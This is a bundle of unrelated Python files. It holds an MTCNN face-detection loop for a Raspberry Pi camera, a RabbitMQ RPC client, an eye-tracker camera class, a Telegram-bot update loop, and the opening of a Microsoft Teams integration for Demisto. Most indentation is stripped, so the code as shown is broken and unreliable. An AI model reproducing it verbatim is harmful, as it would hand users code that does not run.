if total_boxes.shape[0] > 0:
pick = nms(total_boxes, 0.7, 'Union')
#print 'pick', pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[6]:",total_boxes.shape[0])
total_boxes = bbreg(total_boxes, mv[:, pick])
#print("[7]:",total_boxes.shape[0])
total_boxes = rerec(total_boxes)
#print("[8]:",total_boxes.shape[0])
print("Rnet time:")
toc()
#####
# 2 #
#####
#print("2:",total_boxes.shape)
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# third stage
total_boxes = np.fix(total_boxes)
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print 'tmpw', tmpw
#print 'tmph', tmph
#print 'y ', y
#print 'ey', ey
#print 'x ', x
#print 'ex', ex
tempimg = np.zeros((numbox, 48, 48, 3))
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
tempimg[k,:,:,:] = cv2.resize(tmp, (48, 48))
tempimg = (tempimg-127.5)*0.0078125 # [0,255] -> [-1,1]
# ONet
tempimg = np.swapaxes(tempimg, 1, 3)
ONet.blobs['data'].reshape(numbox, 3, 48, 48)
ONet.blobs['data'].data[...] = tempimg
out = ONet.forward()
score = out['prob1'][:,1]
points = out['conv6-3']
pass_t = np.where(score>threshold[2])[0]
points = points[pass_t, :]
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis=1)
#print("[9]:",total_boxes.shape[0])
mv = out['conv6-2'][pass_t, :].T
w = total_boxes[:,3] - total_boxes[:,1] + 1
h = total_boxes[:,2] - total_boxes[:,0] + 1
points[:, 0:5] = np.tile(w, (5,1)).T * points[:, 0:5] + np.tile(total_boxes[:,0], (5,1)).T - 1
points[:, 5:10] = np.tile(h, (5,1)).T * points[:, 5:10] + np.tile(total_boxes[:,1], (5,1)).T -1
if total_boxes.shape[0] > 0:
total_boxes = bbreg(total_boxes, mv[:,:])
#print("[10]:",total_boxes.shape[0])
pick = nms(total_boxes, 0.7, 'Min')
#print pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[11]:",total_boxes.shape[0])
points = points[pick, :]
#####
# 3 #
#####
#print("3:",total_boxes.shape)
print("Onet time:")
toc()
return total_boxes, points
def initFaceDetector():
minsize = 20
caffe_model_path = "/home/duino/iactive/mtcnn/model"
threshold = [0.6, 0.7, 0.7]
factor = 0.709
caffe.set_mode_cpu()
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
return (minsize, PNet, RNet, ONet, threshold, factor)
def haveFace(img, facedetector):
minsize = facedetector[0]
PNet = facedetector[1]
RNet = facedetector[2]
ONet = facedetector[3]
threshold = facedetector[4]
factor = facedetector[5]
if max(img.shape[0], img.shape[1]) < minsize:
return False, []
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
containFace = (True, False)[boundingboxes.shape[0]==0]
return containFace, boundingboxes
def main():
    # set the filter of the video -- VSCO! still not working, maybe later
    # move the blocking I/O operations to a separate thread and maintain a queue
    # of decoded frames in an effort to improve FPS
    # (the .read() method is a blocking I/O operation)
camera = PiCamera()
camera.resolution = (352, 240)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(352, 240))
stream = camera.capture_continuous(rawCapture, format="bgr", use_video_port=True)
camera.close()
vs = PiVideoStream().start()
time.sleep(2.0)
fps = FPS().start()
minsize = 20
caffe_model_path = "./model"
threshold = [0.6, 0.7, 0.7] #initial threshold: 0.6 0.7 0.7
factor = 0.709
caffe.set_mode_cpu() #comment the next few lines?
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
while True:
start = timer()
print("---------------------------------------------")
frame = vs.read()
#frame = imutils.resize(frame, width=400) #do we need to do the resize?
# convert the frame to gray scale and restore the BGR info
#grayFrame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#restore = cv2.cvtColor(grayFrame,cv2.COLOR_GRAY2BGR)
#img = restore
img = frame
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
# check rgb position
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
## copy img to positive folder
#if boundingboxes.shape[0] > 0 :
# import shutil
# shutil.copy(imgpath, '/home/duino/Videos/3/disdata/positive/'+os.path.split(imgpath)[1] )
#else:
# import shutil
# shutil.copy(imgpath, '/home/duino/Videos/3/disdata/negetive/'+os.path.split(imgpath)[1] )
img = drawBoxes(frame, boundingboxes)
cv2.imshow('cam', img)
if cv2.waitKey(1) &0xFF == ord('q'):
break
end = timer()
print ("Total time:",end-start)
fps.update()
#When everything's done, release capture
#cap.release()
cv2.destroyAllWindows()
vs.stop()
vs.update()
if __name__ == "__main__":
main()
|
__init__.py
|
"""An asynchronous RabbitMQ client usable for RPC calls"""
import logging
import secrets
import sys
import threading
import time
import typing
import pika
import pika.exceptions
from pika.adapters.blocking_connection import BlockingChannel
from pika.spec import Basic, BasicProperties
class Client:
__messaging_lock = threading.Lock()
"""Lock used to handle the switching between sending and receiving messages"""
__responses: typing.Dict[str, bytes] = {}
"""Dictionary containing the received messages"""
__events: typing.Dict[str, threading.Event] = {}
"""Dictionary containing the events which shall be set to true if an message was received"""
def __init__(
self,
amqp_dsn: str,
client_name: typing.Optional[str] = secrets.token_urlsafe(nbytes=16),
additional_properties: typing.Optional[typing.Dict[str, str]] = None,
mute_pika: typing.Optional[bool] = False,
):
"""Initialize a new RPC Client and open the connection to the message broker
        :param amqp_dsn: The Data Source Name pointing to the message broker installation. This
            Data Source Name should contain credentials; if it does not, the default credentials
            (user: `guest`, password: `guest`) will be used for authentication
:type amqp_dsn: str
:param client_name: Optional name of the client which will be visible in the management
platform of the message broker, if the platform supports this
:type client_name: str, optional
:param additional_properties: Optional additional client properties which may be set
:type additional_properties: dict[str, str], optional
"""
# Get a logger for this client
if additional_properties is None:
additional_properties = {}
self._logger = logging.getLogger("amqp_rpc_client")
# = Check if the Data Source Name is a valid data source name =
self._logger.debug('Validating the following parameter: "amqp_dsn"')
# Check if the supplied string is not none
self._logger.debug("Checking if the parameter is not None")
if amqp_dsn is None:
raise ValueError("The amqp_dsn is a required parameter")
# Check if the supplied string does not contain whitespaces only
self._logger.debug("Checking if the parameter is not empty")
if len(amqp_dsn.strip()) == 0:
raise ValueError("The amqp_dsn may not be an empty string")
# = Check finished =
self._logger.debug('All checks for parameter "amqp_dsn" passed')
if mute_pika:
self._logger.warning("Muting the underlying pika library completely")
logging.getLogger("pika").setLevel("CRITICAL")
# Parse the amqp_dsn into preliminary parameters
_connection_parameters = pika.URLParameters(amqp_dsn)
# Create a new connection name which is added to the client properties later on
self.connection_name = "amqp-rpc-client#" + secrets.token_hex(nbytes=8)
self._logger.debug("Created connection name for new connection: %s", self.connection_name)
# Combine the additional client properties with those set manually here
_client_properties = additional_properties | {
"connection_name": self.connection_name,
"product": "AMQP-RPC Client",
"platform": "Python {}".format(sys.version),
"information": "Licensed under the 3-Clause BSD License. See the LICENSE file "
"supplied with this library",
"copyright": "Copyright (c) Jan Eike Suchard",
}
self._logger.debug("Setting the following client properties: %s", _client_properties)
# Set the client properties to the connection parameters
_connection_parameters.client_properties = _client_properties
# Create a new blocking connection
self._logger.info("Starting the connection to the message broker")
self._logger.debug("Creating a new BlockingConnection")
self._connection = pika.BlockingConnection(_connection_parameters)
# Open a new channel to the message broker
self._logger.debug("Opening a new channel with the BlockingConnection")
self._channel = self._connection.channel()
# Create a new queue which is exclusive to this client and will be deleted if the client
# disconnects. This queue is used for reading responses
self._logger.debug("Declaring a new exclusive auto-deleting queue in the opened channel")
self._queue = self._channel.queue_declare("", False, False, True, True)
# Save the name generated by the broker as response queue name
self._response_queue_name = self._queue.method.queue
self._logger.info("Connected to the message broker")
# Create an event for stopping the broker
self._stop_event = threading.Event()
# Create an event for allowing messages to be sent after creating the connection
self._allow_messages = threading.Event()
# Create a thread which will handle the data events sent by the broker
self._logger.debug("Setting up the data handling")
self._data_event_handler = threading.Thread(target=self._handle_data_events, daemon=True)
# Start the thread
self._logger.debug("Starting the data handling")
self._data_event_handler.start()
def _handle_data_events(self):
"""Handle new data events and cancel the communication with the message broker if the
event was set"""
# Create a new consumer
self._logger.debug("Creating new message consumer")
self._consumer = self._channel.basic_consume(
queue=self._response_queue_name,
on_message_callback=self._handle_new_message,
auto_ack=False,
exclusive=True,
)
# Start polling for new messages indefinitely
while not self._stop_event.is_set():
# Acquire the internal lock and process possible new data events on the connection
with self.__messaging_lock:
if self._connection.is_open:
self._connection.process_data_events()
self._allow_messages.set()
# Sleep for 0.005 seconds before rechecking the stop flag
time.sleep(0.005)
else:
self._logger.error(
"The connection to the message broker is closed. Stopping " "client"
)
self._stop_event.set()
# Since the stop flag was set we will now cancel the consuming process
self._logger.info("The stopping event was enabled. Cancelling the message consumer")
self._channel.basic_cancel(self._consumer)
# Now acquire the messaging lock to stop messages from being sent
with self.__messaging_lock:
# Close the queue used for responses
self._logger.debug("Closing the response queue")
self._channel.queue_delete(self._response_queue_name)
# Close the channel to the message broker
self._logger.debug("Closing the channel open to the message broker")
self._channel.close()
# Close the connection to the message broker
self._logger.debug("Closing the connection open to the message broker")
self._connection.close()
self._logger.info("Closed the connection to the message broker gracefully")
def _handle_new_message(
self,
channel: BlockingChannel,
method: Basic.Deliver,
properties: BasicProperties,
content: bytes,
):
"""Handle a new incoming message
This will add the response to the response dictionary and will set the event to true
:param channel: The channel used to retrieve the message
:param method: Information about the delivery
:param properties: Properties of the message
:param content: The content of the retrieved message
"""
# Check if the response contained a correlation id if not reject it and log it
if not properties.correlation_id:
self._logger.critical(
"The received message did not contain a correlation id. This "
"message is therefore not accepted and will be rejected"
)
self._channel.basic_reject(method.delivery_tag, requeue=False)
else:
self._logger.debug("Saving the response body to the message list")
self.__responses.update({properties.correlation_id: content})
self._logger.debug("Setting the event correlating to the message to received")
if self.__events.get(properties.correlation_id) is None:
self._logger.critical(
"Error in the messaging events. Unable to find event "
"associated with this correlation id"
)
raise IndexError("Unable to find Event with the correlation id")
else:
self.__events.get(properties.correlation_id).set()
def send(self, content: str, exchange: str) -> str:
"""Send a message to the exchange and get the created message id
:param content: The content which shall be sent to the message broker
:param exchange: The exchange in which the message shall be published
:return: The message id created to identify the request
"""
if not self._connection.is_open:
raise Exception("The AMQP client is not connected to the message broker")
# Create the message id
self._logger.debug("Creating a new message id")
message_id = secrets.token_urlsafe(nbytes=32)
self._logger.debug("Created message id: %s", message_id)
# Create a new event for the message and insert it into the dict
self._logger.debug("Creating a new event for this message")
self.__events.update({message_id: threading.Event()})
self._logger.debug("Created a new event for this message")
# = Send the message to the message broker =
# Acquire the messaging lock to allow this message to be sent
if self._allow_messages.wait():
with self.__messaging_lock:
self._logger.debug("Acquired the messaging lock for sending a message")
try:
self._channel.basic_publish(
exchange=exchange,
routing_key="",
body=content.encode("utf-8"),
properties=pika.BasicProperties(
reply_to=self._response_queue_name,
correlation_id=message_id,
content_encoding="utf-8",
),
)
except pika.exceptions.ChannelWrongStateError:
self._logger.warning(
"The channel used for sending the message is in the "
"wrong state for sending messages. Opening a new channel"
)
self._channel = self._connection.channel()
self._channel.basic_publish(
exchange=exchange,
routing_key="",
body=content.encode("utf-8"),
properties=pika.BasicProperties(
reply_to=self._response_queue_name,
correlation_id=message_id,
content_encoding="utf-8",
),
)
self._logger.debug("Published a new message in the specified exchange")
return message_id
def get_response(self, message_id: str) -> typing.Optional[bytes]:
"""Get a response from the response list
This method will try to get the response content from the dictionary of responses.
If the response is found it will be removed from the response dictionary
:param message_id: The id of the message which was created during the sending
:return: The message body if it already has a response else None
"""
# Check if the response is already available
self._logger.debug("%s - Checking if the response was already received", message_id)
response = self.__responses.pop(message_id, None)
if response is None:
self._logger.debug(
"%s - The response for the message has not been received yet", message_id
)
return response
def await_response(self, message_id: str, timeout: float = None) -> typing.Optional[bytes]:
"""Wait for the response to be handled and return it
This will remove the response from the list of responses
:param message_id: The id of the message which was created during the sending process
:param timeout: Time to wait for the event to be set
:return: The message if the timeout was not reached
"""
# Check if the message id is in the event dictionary
if message_id not in self.__events:
raise ValueError("%s - A message with this ID has not been sent", message_id)
self._logger.info("%s - Waiting for the response to the message", message_id)
# Try to get the event
message_returned = self.__events.get(message_id)
if not message_returned.wait(timeout=timeout):
self._logger.warning(
"%s - The waiting operation timed out after %s seconds and no "
"response was received",
message_id,
timeout,
)
return None
self._logger.debug("%s - Found Response for the message", message_id)
response = self.__responses.pop(message_id, None)
return response
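
# Minimal usage sketch (not part of the original module). The DSN and exchange name
# are placeholders and a reachable RabbitMQ broker is assumed; the import assumes the
# package is installed under the name used by the logger above (amqp_rpc_client).
#
#   from amqp_rpc_client import Client
#
#   client = Client(amqp_dsn="amqp://guest:guest@localhost:5672/%2F")
#   message_id = client.send('{"action": "ping"}', exchange="example-rpc-exchange")
#   response = client.await_response(message_id, timeout=10.0)
#   if response is not None:
#       print(response.decode("utf-8"))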
|
camera_proc.py
|
from PySide2.QtGui import QImage, QPixmap
from PySide2 .QtCore import QObject, Signal, Slot, Property, QBasicTimer, QPoint
from PySide2.QtQuick import QQuickPaintedItem, QQuickImageProvider
from threading import Thread, Lock
from multiprocessing import Process, Pipe, Value, Condition, Array
import cv2
import numpy as np
import time
import uvc
import sys
import traceback
import ctypes
import os
class Camera(QQuickImageProvider, QObject):
'''
This is the base class for all cameras or video used in pEyeTracker.
It is mainly responsible for:
- gathering and managing cam / video specs
- starting / stop a streaming
- providing feedback of gaze data processing to the UI
'''
update_image = Signal()
def __init__(self, name=None):
QQuickImageProvider.__init__(self, QQuickImageProvider.Pixmap)
QObject.__init__(self)
self._image = self.to_QPixmap(cv2.imread("../ui/test.jpg"))
self._np_img = None
self.name = name
self.capturing = Value('i', 0)
self.dev_list = uvc.device_list()
self.fps_res = {}
self.modes = {}
self.mode = None # --> subclassed property
self.shared_array = None # --> subclassed property
self.shared_pos = None # --> subclassed property
self.source = None
self.cap = None
self.pipe, self.child = Pipe()
self.cam_process = None
self.vid_process = None
self.cam_thread = None
self.paused = False
self.gamma = 1.0
self.color = True
self.flip = False
def thread_loop(self):
while self.capturing.value:
time.sleep(0.005)
try:
img = self._get_shared_np_array()
img = self.process(img)
self._np_img = img
qimage = self.to_QPixmap(img)
if qimage is not None:
self._image = qimage
self.update_image.emit()
except Exception as e:
print(">>> Exception:", e)
def _get_shared_np_array(self):
nparray = np.frombuffer(self.shared_array, dtype=ctypes.c_uint8)
w, h = self.mode[0], self.mode[1]
return nparray.reshape((h,w,3))
def create_shared_array(self, mode):
w = mode[0]
h = mode[1]
return Array(ctypes.c_uint8, h*w*3, lock=False)
def requestImage(self, id, size, requestedSize):
return self._image
def requestPixmap(self, id, size, requestImage):
return self._image
def get_np_image(self):
return self._np_img
def init_process(self, source, pipe, array, pos, mode, cap): #abstract
return
def init_vid_process(self, source, pipe, array, pos, mode, cap): #abstract
return
def process(self, img):
return img
def join_process(self): #abstract
return
def join_vid_process(self): # abstract
return
def reset_model(self): #abstract
return
def get_processed_data(self): #abstract
return
def stop(self, video_file=False):
if self.capturing.value:
if self.paused:
self.pipe.send("play")
self.pipe.send("stop")
if video_file:
self.join_vid_process()
if self.vid_process.is_alive():
self.vid_process.terminate()
else:
self.join_process()
if self.cam_process.is_alive():
self.cam_process.terminate()
self.cam_thread.join(1)
def play(self, is_video):
if is_video:
if not self.capturing.value:
self.play_video_file()
else:
self.pipe.send("play")
self.paused = False
def pause(self, is_video):
if is_video:
self.pipe.send("pause")
self.paused = True
def get_source(self):
return self.source
def is_cam_active(self):
if self.cam_thread is not None:
if self.cam_thread.is_alive():
return True
return False
def set_source(self, source):
print('setting camera source to', source)
self.source = source
self.load_state()
self._set_fps_modes()
self.shared_array = self.create_shared_array(self.mode)
self.capturing.value = 1
self.init_process(source, self.child, self.shared_array,
self.shared_pos, self.mode, self.capturing)
self.cam_thread = Thread(target=self.thread_loop, args=())
self.save_state()
self.cam_thread.start()
def set_video_file(self, filename):
cap = cv2.VideoCapture(filename)
w = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
h = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
f = cap.get(cv2.CAP_PROP_FPS)
self.source = filename
self.mode = (int(w),int(h),int(f))
self.modes = {}
self.shared_array = self.create_shared_array(self.mode)
ret, frame = cap.read()
if ret:
qimage = self.to_QPixmap(frame)
if qimage is not None:
self._image = qimage
self.update_image.emit()
cap.release()
def play_video_file(self):
self.capturing.value = 1
self.init_vid_process(self.source, self.child, self.shared_array,
self.shared_pos, self.mode, self.capturing)
self.cam_thread = Thread(target=self.thread_loop, args=())
self.cam_thread.start()
def _set_fps_modes(self):
self.fps_res, self.modes = {}, {}
dev_list = uvc.device_list()
cap = uvc.Capture(dev_list[self.source]['uid'])
for i in range(len(cap.avaible_modes)):
mode = cap.avaible_modes[i]
fps = mode[2]
if fps not in self.fps_res.keys():
self.fps_res[fps] = []
self.modes[fps] = []
resolution = str(mode[0]) + " x " + str(mode[1])
self.modes[fps].append(mode)
self.fps_res[fps].append(resolution)
if self.mode not in cap.avaible_modes:
self.mode = sorted(cap.avaible_modes)[0]
cap.close()
@Property('QVariantList')
def fps_list(self):
return sorted(list(self.fps_res.keys()))
@Property('QVariantList')
def modes_list(self):
curr_fps = self.mode[2]
return self.fps_res[curr_fps]
@Property(int)
def current_fps_index(self):
curr_fps = self.mode[2]
fps_list = sorted(list(self.fps_res.keys()))
return fps_list.index(curr_fps)
@Property(int)
def current_fps(self):
curr_fps = self.mode[2]
return curr_fps
@Property(int)
def current_res_index(self):
w,h,fps = self.mode
curr_res = str(w) + " x " + str(h)
res_list = self.fps_res[fps]
return res_list.index(curr_res)
@Slot(str, str)
def set_mode(self, fps, resolution):
self.stop()
res = resolution.split('x')
self.mode = (int(res[0]), int(res[1]), int(fps))
self._set_fps_modes()
print("setting mode:", self.mode)
if resolution not in self.fps_res[int(fps)]:
print("setting mode:", self.modes[int(fps)][0])
self.mode = self.modes[int(fps)][0]
self.shared_array = self.create_shared_array(self.mode)
self.pipe, self.child = Pipe()
self.capturing.value = 1
self.init_process(self.source, self.child, self.shared_array,
self.shared_pos, self.mode, self.capturing)
self.cam_thread = Thread(target=self.thread_loop, args=())
self.save_state()
self.cam_thread.start()
@Slot(float)
def set_gamma(self, value):
self.gamma = value
self.pipe.send("gamma")
self.pipe.send(value)
@Slot(float)
def set_color(self, value):
self.color = value
self.pipe.send("color")
self.pipe.send(bool(value))
@Slot(float)
def flip_image(self, value):
self.flip = value
self.pipe.send("flip")
self.pipe.send(bool(value))
@Slot()
def reset(self):
self.reset_model()
def to_QPixmap(self, img):
if img is None:
return
if len(img.shape) == 3:
h,w,_ = img.shape
rgbimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
#flipimg = cv2.flip(rgbimg,1)
qimg = QImage(rgbimg.data, w, h, QImage.Format_RGB888)
pixmap = QPixmap.fromImage(qimg)
return pixmap
def save_state(self):
with open('config/'+self.name+'config.txt', 'w') as f:
data = str(self.mode[0]) + ':'
data += str(self.mode[1]) + ':'
data += str(self.mode[2]) #+ ':'
#data += str(self.gamma) + ':'
#data += str(int(self.color))
f.write(data)
def load_state(self):
if os.path.isfile('config/'+self.name+'config.txt'):
with open('config/'+self.name+'config.txt', 'r') as f:
d = f.readline().split(':')
self.mode = (int(d[0]), int(d[1]), int(d[2]))
if __name__=="__main__":
    cam = Camera(name="test")  # a name is required by save_state()/load_state()
    cam.set_source(0)          # set_source() already starts the capture thread
# dev_list = uvc.device_list()
# cap = uvc.Capture(dev_list[2]['uid'])
# print(cap.avaible_modes)
|
loop.py
|
import sys
import time
import json
import threading
import traceback
import collections
try:
import Queue as queue
except ImportError:
import queue
from . import exception
from . import _find_first_key, flavor_router
class RunForeverAsThread(object):
def run_as_thread(self, *args, **kwargs):
t = threading.Thread(target=self.run_forever, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class CollectLoop(RunForeverAsThread):
def __init__(self, handle):
self._handle = handle
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self):
while 1:
try:
msg = self._inqueue.get(block=True)
self._handle(msg)
except:
traceback.print_exc()
class GetUpdatesLoop(RunForeverAsThread):
def __init__(self, bot, on_update):
self._bot = bot
self._update_handler = on_update
def run_forever(self, relax=0.1, offset=None, timeout=20, allowed_updates=None):
"""
Process new updates in infinity loop
:param relax: float
:param offset: int
:param timeout: int
        :param allowed_updates: list of str
"""
while 1:
try:
result = self._bot.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_updates)
# Once passed, this parameter is no longer needed.
allowed_updates = None
# No sort. Trust server to give messages in correct order.
for update in result:
try:
self._update_handler(update)
offset = update['update_id'] + 1
except:
pass
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def _dictify3(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
elif type(data) is str:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def _dictify27(data):
if type(data) in [str, unicode]:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
_dictify = _dictify3 if sys.version_info >= (3,) else _dictify27
def _extract_message(update):
try:
key = _find_first_key(update, ['message',
'edited_message',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query'])
return key, update[key]
except:
pass
def _infer_handler_function(bot, h):
if h is None:
return bot.handle
elif isinstance(h, dict):
return flavor_router(h)
else:
return h
class MessageLoop(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._handle = _infer_handler_function(bot, handle)
def run_forever(self, *args, **kwargs):
"""
:type relax: float
:param relax: seconds between each :meth:`.getUpdates`
:type offset: int
:param offset:
initial ``offset`` parameter supplied to :meth:`.getUpdates`
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`.getUpdates`, controlling
how long to poll.
:type allowed_updates: array of string
:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`.getUpdates`,
controlling which types of updates to receive.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
collectloop = CollectLoop(self._handle)
updatesloop = GetUpdatesLoop(self._bot,
lambda update:
collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
# feed events to collect loop
self._bot.scheduler.on_event(collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
updatesloop.run_as_thread(*args, **kwargs)
collectloop.run_forever() # blocking
class Webhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
def run_forever(self):
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._collectloop.run_forever()
def feed(self, data):
update = _dictify(data)
self._collectloop.input_queue.put(_extract_message(update)[1])
class Orderer(RunForeverAsThread):
def __init__(self, on_ordered_update):
self._on_ordered_update = on_ordered_update
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self, maxhold=3):
def handle(update):
self._on_ordered_update(update)
return update['update_id']
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
while 1:
try:
update = self._inqueue.get(block=True, timeout=qwait)
if max_id is None:
# First message received, handle regardless.
max_id = handle(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = handle(update)
                    # clear contiguous updates in the buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft()) # updates that arrived earlier, handle them.
else:
                                break # gap, no more contiguous updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
# Update arrives pre-maturely, insert to buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id']-max_id-1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
if qwait < 0:
qwait = 0
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
class OrderedWebhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
self._orderer = Orderer(lambda update:
self._collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
def run_forever(self, *args, **kwargs):
"""
:type maxhold: float
:param maxhold:
The maximum number of seconds an update is held waiting for a
not-yet-arrived smaller ``update_id``. When this number of seconds
is up, the update is delivered to the message-handling function
even if some smaller ``update_id``\s have not yet arrived. If those
smaller ``update_id``\s arrive at some later time, they are discarded.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._orderer.run_as_thread(*args, **kwargs)
self._collectloop.run_forever()
def feed(self, data):
"""
:param data:
One of these:
- ``str``, ``unicode`` (Python 2.7), or ``bytes`` (Python 3, decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
"""
update = _dictify(data)
self._orderer.input_queue.put(update)
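
# Usage sketch (not part of the original module): Orderer re-orders updates by
# update_id before handing them to a callback. The snippet is illustrative and feeds
# updates out of order; the handler still sees them as 1, 2, 3.
#
#   orderer = Orderer(lambda update: print('handled', update['update_id']))
#   orderer.run_as_thread(maxhold=3)
#   orderer.input_queue.put({'update_id': 1})
#   orderer.input_queue.put({'update_id': 3})  # held back until id 2 arrives or maxhold expires
#   orderer.input_queue.put({'update_id': 2})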
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
ENTRY_FOOTER: str = 'From Microsoft Teams'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
